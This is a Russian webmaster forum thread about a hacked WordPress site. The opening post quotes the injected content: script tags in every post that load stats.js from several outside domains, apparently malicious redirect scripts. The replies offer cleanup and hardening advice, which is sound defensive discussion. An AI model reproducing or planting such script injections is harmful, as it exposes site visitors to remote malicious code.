Залили код в БД WP

Y
На сайте с 24.12.2010
Offline
102
1301

Залили в wp_posts post_content во все записи скрипт:

<strong>Эoзинофилы</strong> — бeлые кровяные клетки, присутствующие в местаx протекания аллергичeских реaкций, при инвазии пaразитичeскими чeрвями и участвующие в реaкцияx, вызываeмыx некоторыми лекaрствами.<script src='https://js.garrygudini.com/stats.js?l=p&' type='text/javascript'></script><script src='https://js.garrygudini.com/stats.js?l=p&' type='text/javascript'></script><script src='https://letsmakesomechoice.com/stats.js?l=p&' type='text/javascript'></script><script src='https://letsmakesomechoice.com/stats.js?l=p&' type='text/javascript'></script><script src='https://traveltogandi.com/stats.js?l=p&' type='text/javascript'></script><script src='https://traveltogandi.com/stats.js?l=p&' type='text/javascript'></script><script src='https://traveltogandi.com/stats.js?l=p&' type='text/javascript'></script><script src='https://traveltogandi.com/stats.js?l=p&' type='text/javascript'></script>

Подскажите, как для начала вырезать его со всех постов, а потом понять как его залили.

S
На сайте с 30.09.2016
Offline
459
#1
YMua:
бeлые кровяные клетки, присутствующие в местаx протекания аллергичeских реaкций, при инвазии пaразитичeскими чeрвями и участвующие в реaкцияx, вызываeмыx некоторыми лекaрствами

Редкостная чушь.

YMua:
Подскажите, как для начала вырезать его со всех постов, а потом понять как его залили.
Лучше наоборот, иначе будет соревнование по заливке и удалению. Вырезать - каким-нибудь плагином для поиска и замены в БД. Но как залили - никто не подскажет. Существует 100500 вариантов.
Отпилю лишнее, прикручу нужное, выправлю кривое. Вытравлю вредителей.
Y
На сайте с 24.12.2010
Offline
102
#2

Мне нужно срочно удалить редиректы, на сайте статьи со ссылками с миралинкса, вэбмастера жалобы пишут в ТП. Потом можно будет смотреть на бэкапе.

Какой лучше плагин, раньше никогда с такими не сталкивался.

---------- Добавлено 29.05.2019 в 23:16 ----------

Удалил код плагином и сразу такой вопрос.

Можно как-то запретить запись в БД, оставив только чтение?

SV
На сайте с 03.11.2008
Offline
1345
#3
YMua:
Можно как-то запретить запись в БД, оставив только чтение?

Нужно не вентиляцию заколачивать, а от дыр избавляться.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Топики помощи с ⓌordPress (https://searchengines.guru/ru/forum/1032910 ) и основы безопасности сайтов ( https://searchengines.guru/ru/forum/774117 ). *** Помощь\консультации в топиках форума - БЕСПЛАТНО. Платные услуги ( https://wp.me/P3YHjQ-3 ) - с бюджетом от 150$ ***
SV
На сайте с 03.11.2008
Offline
1345
#4
LeFF®:
Пароль на БД смените в конфиг файле

Это прелестно :)

А чё- поломать сайт - нормальный выход. :)

И ты что, серьёзно полагаешь что кто-то коннектиться к базе напрямую? И наверное через ПМА изменяют контент? :)

ego
На сайте с 15.01.2007
Offline
122
ego
#5

Скачайте сайт, проверьте айболитом, ну и этим сервисом https://www.virustotal.com/gui/home/upload

Меняйте все пароли.

Дальше по результатам проверки чистите и наблюдайте за сайтом.

СМИ (ЯК, Dmoz) тИЦ 250 (/ru/forum/799835) для ваших статей. Разработка сайтов на WordPress. Портфолио (http://www.egoroff.info/portfolio/)
SV
На сайте с 03.11.2008
Offline
1345
#6
LeFF®:
adminer обычно он называется

Всё понятно..

Тяжелый случай :)

S
На сайте с 30.09.2016
Offline
459
#7
SeVlad:
И ты что, серьёзно полагаешь что кто-то коннектиться к базе напрямую?

Конвейерные взломщики - нет. Индивидуальные - сколько угодно.

LeFF®:
280-350 кб. файл
Хватит и 1кБ с запасом, чтобы ещё и игрушек на ёлку повесить.
S
На сайте с 30.09.2016
Offline
459
#8
LeFF®:
Да там не конвеерная работа. Через SQL инжект залить такой объем текста да еще со скриптами и html разметкой не реал - тупо часть символов порежет.

Конвейерный взлом !== SQL инжект. Там тоже скрипты.

Суть не в этом. Массовые взломы обычно лечатся чисткой сайта и закрытием дыры, для индивидуальных же этого недостаточно. Там действительно необходимо менять доступы к БД.

И да, между прочим. Через SQL инжект текст никто не заливает вообще, ни малый объём, ни большой. Слышал звон, да не знаешь, где он. (С)

SV
На сайте с 03.11.2008
Offline
1345
#9
Sitealert:
Конвейерные взломщики - нет. Индивидуальные - сколько угодно.

Индивидуальные - капля в океане по сравнению с конвейерными :) (начиная с "дорогое удовольствие" и заканчивая "гафик не нужно, т.к. есть 100500 других доступных сайтов").

Кроме того в большинстве случаев либо так не прокатит (ибо есть запрет подключений с левых IP) либо уже имеют доступ к файлам, а значит и к чтению конфига. Так что смена доступов к базе - тупейшая мера "безопасности" (можно применить разве только после реализации всех остальных мер).

PA
На сайте с 15.02.2018
Offline
53
#10

Yuzo Related Posts не стоит? Wordpress обновляли вовремя? Сайты изолированы?

Если все это выполнено, то на вскидку не сказать в чем причина. Используйте ai-bolit для чистки от залитого кода, ну и если контента не много, то руками или попробуйте Wordfence Security. А так sql запросами, но тут главное не ошибаться.

Почти дедик (https://goo.gl/qV1T7s) дешево|Мои VDS (https://is.gd/vds100) быстрее твоих|Продаю хостинг

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий